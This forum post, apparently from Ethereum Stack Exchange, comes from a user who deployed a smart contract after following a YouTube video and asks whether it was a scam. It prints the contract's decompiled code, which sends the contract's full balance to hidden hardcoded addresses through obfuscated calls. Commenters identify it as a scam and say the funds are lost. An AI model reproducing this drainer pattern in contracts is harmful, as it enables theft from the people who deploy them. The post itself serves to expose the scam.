1

Background

I followed the following video: https://www.youtube.com/watch?v=Vhkb9G2SyVw&list=LL&index=109 and want to confirm if I got scammed and/or if there is anyway I can send the value from the contract back to my wallet.

Contract Address: 0x03a5149F398bC627080657136c47B20af0ea2A08

Decompiled Contract Code

def storage:
  stor1 is addr at storage 1
  stor2 is addr at storage 2
  stor4 is uint8 at storage 4

def _fallback() payable: # default function
  if tx.origin == 0x2aeef5e65385c72e985e0361baa234ff00ce1996:
      mem[128 len calldata.size] = call.data[0 len calldata.size]
      mem[calldata.size + 128] = 0
      call addr(Mask(96, 0, calldata.size), mem[128 len 20] + 39028) with:
         value eth.balance(this.address) wei
           gas 2300 * is_zero(value) wei
      if not ext_call.success:
          revert with ext_call.return_data[0 len return_data.size]

def start() payable: 
  if stor4:
      stor4 = 0
      stop
  mem[96] = 0x52efd68500000000000000000000000000000000000000000000000000000000
  mem[100] = eth.balance(this.address)
  require ext_code.size(stor2)
  call stor2.0x52efd685 with:
       gas gas_remaining wei
      args eth.balance(this.address)
  if not ext_call.success:
      revert with ext_call.return_data[0 len return_data.size]
  mem[96 len return_data.size] = ext_call.return_data[0 len return_data.size]
  mem[64] = ceil32(return_data.size) + 96
  require return_data.size >= 32
  _4 = mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32
  require mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 <= 4294967296
  require mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + 32 <= return_data.size
  require mem[mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + 96] <= 4294967296 and mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + mem[mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + 96] + 32 <= return_data.size
  mem[ceil32(return_data.size) + 96] = mem[mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + 96]
  _7 = mem[_4 + 96]
  mem[ceil32(return_data.size) + 128 len ceil32(mem[_4 + 96])] = mem[_4 + 128 len ceil32(mem[_4 + 96])]
  if not _7 % 32:
      mem[64] = _7 + ceil32(return_data.size) + 128
      mem[_7 + ceil32(return_data.size) + 128] = 0x8c379a000000000000000000000000000000000000000000000000000000000
      mem[_7 + ceil32(return_data.size) + 132] = 32
      mem[_7 + ceil32(return_data.size) + 164] = mem[ceil32(return_data.size) + 96]
      mem[_7 + ceil32(return_data.size) + 196 len ceil32(mem[ceil32(return_data.size) + 96])] = mem[ceil32(return_data.size) + 128 len ceil32(mem[ceil32(return_data.size) + 96])]
      if not mem[ceil32(return_data.size) + 96] % 32:
          revert with 0, 32, mem[_7 + ceil32(return_data.size) + 164 len mem[ceil32(return_data.size) + 96] + 32]
      mem[floor32(mem[ceil32(return_data.size) + 96]) + _7 + ceil32(return_data.size) + 196] = mem[floor32(mem[ceil32(return_data.size) + 96]) + _7 + ceil32(return_data.size) + -(mem[ceil32(return_data.size) + 96] % 32) + 228 len mem[ceil32(return_data.size) + 96] % 32]
      revert with 0, 
                  32,
                  mem[ceil32(return_data.size) + 96],
                  mem[_7 + ceil32(return_data.size) + 196 len floor32(mem[ceil32(return_data.size) + 96]) + 32]
  mem[floor32(_7) + ceil32(return_data.size) + 128] = mem[floor32(_7) + ceil32(return_data.size) + -(_7 % 32) + 160 len _7 % 32]
  mem[64] = floor32(_7) + ceil32(return_data.size) + 160
  mem[floor32(_7) + ceil32(return_data.size) + 160] = 0x8c379a000000000000000000000000000000000000000000000000000000000
  mem[floor32(_7) + ceil32(return_data.size) + 164] = 32
  mem[floor32(_7) + ceil32(return_data.size) + 196] = mem[ceil32(return_data.size) + 96]
  mem[floor32(_7) + ceil32(return_data.size) + 228 len ceil32(mem[ceil32(return_data.size) + 96])] = mem[ceil32(return_data.size) + 128 len ceil32(mem[ceil32(return_data.size) + 96])]
  if not mem[ceil32(return_data.size) + 96] % 32:
      revert with 0, 32, mem[floor32(_7) + ceil32(return_data.size) + 196 len mem[ceil32(return_data.size) + 96] + 32]
  mem[floor32(mem[ceil32(return_data.size) + 96]) + floor32(_7) + ceil32(return_data.size) + 228] = mem[floor32(mem[ceil32(return_data.size) + 96]) + floor32(_7) + ceil32(return_data.size) + -(mem[ceil32(return_data.size) + 96] % 32) + 260 len mem[ceil32(return_data.size) + 96] % 32]
  revert with 0, 
              32,
              mem[ceil32(return_data.size) + 96],
              mem[floor32(_7) + ceil32(return_data.size) + 228 len floor32(mem[ceil32(return_data.size) + 96]) + 32]

def withdrawal() payable: 
  if eth.balance(this.address) < 15 * 10^16:
      call stor1 with:
         value eth.balance(this.address) wei
           gas 2300 * is_zero(value) wei
      if not ext_call.success:
          revert with ext_call.return_data[0 len return_data.size]
      stop
  mem[96] = 0xccc9879000000000000000000000000000000000000000000000000000000000
  mem[100] = eth.balance(this.address)
  require ext_code.size(stor2)
  call stor2.w(uint256 vv) with:
       gas gas_remaining wei
      args eth.balance(this.address)
  if not ext_call.success:
      revert with ext_call.return_data[0 len return_data.size]
  mem[96 len return_data.size] = ext_call.return_data[0 len return_data.size]
  mem[64] = ceil32(return_data.size) + 96
  require return_data.size >= 32
  _6 = mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32
  require mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 <= 4294967296
  require mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + 32 <= return_data.size
  require mem[mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + 96] <= 4294967296 and mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + mem[mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + 96] + 32 <= return_data.size
  mem[ceil32(return_data.size) + 96] = mem[mem[96 len 4], Mask(224, 32, eth.balance(this.address)) >> 32 + 96]
  _9 = mem[_6 + 96]
  mem[ceil32(return_data.size) + 128 len ceil32(mem[_6 + 96])] = mem[_6 + 128 len ceil32(mem[_6 + 96])]
  if not _9 % 32:
      mem[64] = _9 + ceil32(return_data.size) + 128
      mem[_9 + ceil32(return_data.size) + 128] = 0x8c379a000000000000000000000000000000000000000000000000000000000
      mem[_9 + ceil32(return_data.size) + 132] = 32
      mem[_9 + ceil32(return_data.size) + 164] = mem[ceil32(return_data.size) + 96]
      mem[_9 + ceil32(return_data.size) + 196 len ceil32(mem[ceil32(return_data.size) + 96])] = mem[ceil32(return_data.size) + 128 len ceil32(mem[ceil32(return_data.size) + 96])]
      if not mem[ceil32(return_data.size) + 96] % 32:
          revert with 0, 32, mem[_9 + ceil32(return_data.size) + 164 len mem[ceil32(return_data.size) + 96] + 32]
      mem[floor32(mem[ceil32(return_data.size) + 96]) + _9 + ceil32(return_data.size) + 196] = mem[floor32(mem[ceil32(return_data.size) + 96]) + _9 + ceil32(return_data.size) + -(mem[ceil32(return_data.size) + 96] % 32) + 228 len mem[ceil32(return_data.size) + 96] % 32]
      revert with 0, 
                  32,
                  mem[ceil32(return_data.size) + 96],
                  mem[_9 + ceil32(return_data.size) + 196 len floor32(mem[ceil32(return_data.size) + 96]) + 32]
  mem[floor32(_9) + ceil32(return_data.size) + 128] = mem[floor32(_9) + ceil32(return_data.size) + -(_9 % 32) + 160 len _9 % 32]
  mem[64] = floor32(_9) + ceil32(return_data.size) + 160
  mem[floor32(_9) + ceil32(return_data.size) + 160] = 0x8c379a000000000000000000000000000000000000000000000000000000000
  mem[floor32(_9) + ceil32(return_data.size) + 164] = 32
  mem[floor32(_9) + ceil32(return_data.size) + 196] = mem[ceil32(return_data.size) + 96]
  mem[floor32(_9) + ceil32(return_data.size) + 228 len ceil32(mem[ceil32(return_data.size) + 96])] = mem[ceil32(return_data.size) + 128 len ceil32(mem[ceil32(return_data.size) + 96])]
  if not mem[ceil32(return_data.size) + 96] % 32:
      revert with 0, 32, mem[floor32(_9) + ceil32(return_data.size) + 196 len mem[ceil32(return_data.size) + 96] + 32]
  mem[floor32(mem[ceil32(return_data.size) + 96]) + floor32(_9) + ceil32(return_data.size) + 228] = mem[floor32(mem[ceil32(return_data.size) + 96]) + floor32(_9) + ceil32(return_data.size) + -(mem[ceil32(return_data.size) + 96] % 32) + 260 len mem[ceil32(return_data.size) + 96] % 32]
  revert with 0, 
              32,
              mem[ceil32(return_data.size) + 96],
              mem[floor32(_9) + ceil32(return_data.size) + 228 len floor32(mem[ceil32(return_data.size) + 96]) + 32]
Improve this question
4
  • Unfortunately, it seems you were scammed and it doesn't look possible to retrieve your funds. For future reference never deploy or send money to a contract/address you don't trust or fully understand. See this post for more information: ethereum.stackexchange.com/questions/152373/…
    – Rohan Nero
    Commented Mar 7 at 20:15
  • Can you walk me through the above decompiled contract code that explains how the scam works?
    – Christopher Volante
    Commented Mar 7 at 21:10
  • The contract creator has included a jumble of assembly code to try and obscure the contract functionality and intentions. It likely deals with putting together the attacker's address and then sending any contract funds to it. You can see multiple calls with the contract's Ethereum balance as input. It is impossible for a smart contract to passively generate you trading income without any external tooling/scripts. (not talking about staking yield or anything like that).
    – Rohan Nero
    Commented Mar 7 at 21:22
  • Your money is gone. Nobody can help you. Do not program smart contracts unless you understand what you are doing. The smart contract is obfuscated and obviously malicious for anyone who has done any programming. Do not believe things you see on Youtube.
    – Mikko Ohtamaa
    Commented Mar 7 at 22:39

0

Reset to default

Browse other questions tagged or ask your own question.